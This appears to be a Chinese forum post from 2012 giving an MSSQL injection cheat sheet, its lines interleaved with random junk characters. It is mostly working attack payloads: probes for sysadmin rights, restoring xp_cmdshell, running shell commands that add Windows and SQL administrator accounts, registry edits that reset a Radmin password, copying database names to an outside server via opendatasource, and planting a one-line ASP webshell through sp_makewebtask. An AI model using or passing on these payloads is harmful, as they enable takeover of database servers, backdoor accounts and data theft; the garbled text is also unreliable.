//看看是什么权限的 C, J7 L1 Z& V+ W( J
and 1=(Select IS_MEMBER('db_owner'))
0 N5 [" o3 a$ K1 A! ]: c; xAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--8 o/ O Y% x3 \5 [+ Y$ v
4 ^0 e" D0 K( @1 l
//检测是否有读取某数据库的权限0 y, x5 U: A. z+ d
and 1= (Select HAS_DBACCESS('master'))
3 M& l, L3 S K5 x6 v! N9 m1 B" o) dAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
9 s5 V1 f% z5 ]3 S/ z7 o# x9 B
; E& y+ a: `% c1 t& A3 W
) Q/ T: Z5 t) J, _数字类型
# M4 H3 t) x' m o* |4 \and char(124)%2Buser%2Bchar(124)=0
* i M: d5 w: ^! M w1 A. ~4 l
$ Y1 S5 [) Z: \* o* a! [; m! I字符类型
. P/ p; h3 {- i+ z/ a! S: ?' and char(124)%2Buser%2Bchar(124)=0 and ''='3 Y2 @9 ?3 H- \
4 w, S; J3 C) a! O+ l; s, b- O搜索类型
2 L$ c# g% k6 T" |6 f' and char(124)%2Buser%2Bchar(124)=0 and '%'='
3 f& |$ N4 S( o9 C% X7 b
/ `- G. @! f5 z爆用户名
: ]& f$ r+ u8 x; a' J5 @' Rand user>0
% X2 t9 p( _2 N Z9 x' and user>0 and ''=') k {9 I2 R T
" Q: R9 \. N- r& c2 b
检测是否为SA权限
/ J- {5 l) u& c. d$ v1 h2 u9 e+ mand 1=(select IS_SRVROLEMEMBER('sysadmin'));--1 G9 G# ^) Z5 u: \9 n& b5 S
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --" N' r% J, }' W
. A4 ~) J5 H6 {; H; z: |9 ^- e检测是不是MSSQL数据库. s S* _, [* D2 E7 E" e
and exists (select * from sysobjects);--
# ~0 ]) x! z) x: G5 v5 T& e# E. ?6 e# d
检测是否支持多行
! F# V9 o; n4 L. u9 }9 Q' T& l;declare @d int;--
' Y) N% Z4 s, `( v1 L' C, Q- ~' X9 I
恢复 xp_cmdshell
( J0 Z. j' z2 ?+ \;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';-- N$ ^# |( M7 V$ z: _
1 Q/ {9 W9 z7 a. v6 x! w( W& z' ^0 W' d8 X- |$ g
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')% P$ ]9 v# C+ U: U3 P; @* [. M7 {* J
0 O% [9 O" ~; E) N, F, A- o9 ~//-----------------------$ ]. U. H& a& c6 Z! C$ H p6 L* v
// 执行命令3 k2 h1 c, c& ~# A( t3 E
//-----------------------
5 h& j y# J, [) X; U0 N3 a首先开启沙盘模式:
$ o2 k( p% j$ K$ w3 j- o7 dexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
) s# H1 G! g( u' `9 a" }+ @' \: H8 D8 g4 ?9 _
然后利用jet.oledb执行系统命令
- E% w4 J4 e: x& \select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
! M( o, q& q" T: ?9 y! X& b9 j
4 U$ {8 D, t ?3 Y执行命令* _/ \( O: p2 q4 }- ? v: \
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
# z/ K* g1 s5 i, k) i. h1 Q
3 ]+ C1 P! m Q! f2 f. V# E6 yEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'5 e) O# \6 r0 P7 s/ l3 q; |
1 f9 N& b8 S F+ I
判断xp_cmdshell扩展存储过程是否存在:
" v* ?5 r$ k+ k% w5 {" D" \, Chttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')* X. J: v7 D+ ?! _5 }# D
/ r# C* S A" ~写注册表) P9 p8 h( C i' K8 m7 h6 {2 J2 F
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1( a' [- i4 I% r: k3 @% i: Q
% ^* J4 s0 A% ~( v2 f# Z" |- {REG_SZ
( k8 l+ K, d$ m0 H5 ?7 x0 T9 W2 p) S/ f% E9 [& J: n1 l: J- l! |
读注册表3 t% r, {: k/ B5 ?
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'* D" N3 {$ A) F* H' A/ C, E
' {5 o6 I' s1 D1 Z" V) e读取目录内容
; d( w, v! b$ G) f3 G% a8 Iexec master..xp_dirtree 'c:\winnt\system32\',1,1
q; j. g4 s, S+ _4 C" |
) U! S# e$ ~; `9 X# h/ X* B. n/ }( L, m$ b0 a/ L! j H) Y
数据库备份' _; O; L3 e* B$ c% G( S
backup database pubs to disk = 'c:\123.bak'& O H, m. ]8 `1 |' G& J
% {" j7 L& s3 V: k* }//爆出长度& x3 Y* h v0 C! x! U
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
3 g$ R# A. q* `/ j$ c! e; L: F# u# t
6 c# P- z6 v+ l h& @/ l7 d0 ~
2 H7 z2 g/ R+ u3 M' w l) [. E' g) ?更改sa口令方法:用sql综合利用工具连接后,执行命令:
' W, [: g. }3 Lexec sp_password NULL,'新密码','sa') }0 Q8 R g6 Q) T! i9 D+ G
G/ v, v; V3 _# O1 f5 E ~
添加和删除一个SA权限的用户test:
8 D1 s0 q# N1 L* @2 G/ i! [: Texec master.dbo.sp_addlogin test,9530772
' G2 S3 Q0 Y- Texec master.dbo.sp_addsrvrolemember test,sysadmin2 x1 v# e8 w8 N- J
7 ?6 U9 [, j2 @ W& [+ |删除扩展存储过过程xp_cmdshell的语句:
- G6 \; b# G7 D- Q. ]1 \exec sp_dropextendedproc 'xp_cmdshell'; C# n7 b/ K& `. w! c9 D0 X e& Q# T
9 B9 |3 `5 ^! e3 o添加扩展存储过过程
2 {' o m3 `4 kEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
6 ?6 h# r0 e$ G0 S2 Z& sGRANT exec On xp_proxiedadata TO public2 A5 f0 h" f' f0 L' }
6 I' p% x9 n; B- Y" \
) g& ]4 k4 I/ V% w5 s; U7 `停掉或激活某个服务。
7 _' t$ |, S) t6 V+ E! [2 @+ w( [" x2 l9 e" A, q. x1 p
exec master..xp_servicecontrol 'stop','schedule'
6 i& ~6 c4 B- q7 E2 c- Hexec master..xp_servicecontrol 'start','schedule'
9 u, w- s$ E$ J( G% c/ i
$ ?* Z9 x0 ~& C# Ddbo.xp_subdirs
% e4 J2 y q3 x/ \0 K' R1 _6 v5 V+ q6 p; n8 K5 M+ g" ]
只列某个目录下的子目录。3 Y: x8 i1 M7 o! S' ~; r; O5 G! w
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'% ~+ Y/ N3 _3 |
( Y2 Q0 R) T% Z [9 w3 d
dbo.xp_makecab
+ v9 L. X) l' K: t) i* q2 ^/ m
% q; N; N' w9 _. a. E将目标多个档案压缩到某个目标档案之内。
4 w. N1 M s* d8 N% x. m J所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。+ f5 f9 l8 ~6 `6 D5 i
" n) p: g! y- Idbo.xp_makecab5 F: c% o6 |+ ~6 u- T* k2 j
'c:\test.cab','mszip',1,
, O8 C4 e2 B7 c# P; M'C:\Inetpub\wwwroot\SQLInject\login.asp',
: f( O* X. G- w# E'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'% [2 Y4 A+ Z& C. H+ j
: w' R7 j9 z4 l7 ]+ z* e& w
xp_terminate_process
! J$ u- d; z8 e- c' i# u+ k4 J5 y
6 b. r( [/ ]) t+ Q$ \' F停掉某个执行中的程序,但赋予的参数是 Process ID。0 L$ q5 Z* V! j+ N% N) p! n
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
. B4 S, X. ^% S, r% w: _/ N- [0 T) b% G7 v" J1 d% i n
xp_terminate_process 2484
" s& o" a8 O& G0 J7 T& L5 t3 R6 O5 @1 g( n9 V+ Y
xp_unpackcab- ^: J9 b# U1 }! ? F1 X
! Z+ g/ H! g% i2 c- L
解开压缩档。# c Y6 u; h) u% B5 O
8 U" t+ ]: @4 b7 D* I- [xp_unpackcab 'c:\test.cab','c:\temp',1
" G' S* b! d0 p0 J' c, w
1 b$ o n' a/ r0 I9 ?5 H
1 } v- N- O6 @5 w+ y$ d6 ?. S某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
- z$ C9 k% u# m3 s7 ]
* x9 A# \/ W/ K/ I: V. G( O- acreate database lcx;
/ z5 H$ C- w* r: b: T7 N" _Create TABLE ku(name nvarchar(256) null);
' B8 s% j- y3 N, E4 E7 r hCreate TABLE biao(id int NULL,name nvarchar(256) null);
3 q+ r6 ~& \# A3 g0 ?3 x& l- `4 S; W5 H( G$ T' o
//得到数据库名
0 x7 R: k' B3 U. e" ~6 @insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
* O( i& }+ b9 G9 |6 a
7 {- J: Z: J6 Y5 b& b+ t; j3 J% u* ?( Y; m/ N( F; q k- s
//在Master中创建表,看看权限怎样! r+ i( S: S3 `5 W3 }
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--+ r$ c2 P8 Z: K I/ }
/ R. T1 g9 }2 R+ ]用 sp_makewebtask直接在web目录里写入一句话马:
: f9 d K! d/ k, c4 v/ Fhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
6 G9 U% c" @, `, J0 J P2 O7 r7 n" z, e X: G
//更新表内容) |8 W& T7 l1 G( e2 ]
Update films SET kind = 'Dramatic' Where id = 123
9 d3 s: j5 U+ ^: R) p
. ]6 k2 ^3 C& X; q' E* n& }, Z//删除内容
) \6 ]" M6 @6 G! y& `) `4 kdelete from table_name where Stockid = 3 |
发表于 2012-9-15 14:40:13
收藏
支持
反对